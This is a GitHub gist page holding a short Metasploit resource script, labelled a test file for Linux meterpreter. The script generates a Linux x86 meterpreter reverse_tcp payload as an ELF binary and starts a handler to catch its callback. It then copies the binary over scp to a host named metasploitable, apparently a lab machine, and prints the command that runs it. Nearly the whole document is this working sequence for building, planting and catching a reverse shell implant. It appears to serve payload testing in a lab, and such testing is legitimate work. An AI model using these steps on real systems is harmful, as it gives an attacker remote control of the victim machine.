Skip to content

Instantly share code, notes, and snippets.

@todb-r7
Last active August 29, 2015 14:13
Show Gist options
  • Save todb-r7/4c43e95ee188b1abd986 to your computer and use it in GitHub Desktop.
Save todb-r7/4c43e95ee188b1abd986 to your computer and use it in GitHub Desktop.
A test file for linux meterpreter
use payload/linux/x86/meterpreter/reverse_tcp
generate -t elf -f meterpreter.bin
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
exploit -j
ssh metasploitable killall meterpreter
scp ./meterpreter.bin metasploitable:~
echo [*] Now do this:
echo ssh metasploitable ./meterpreter.bin
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment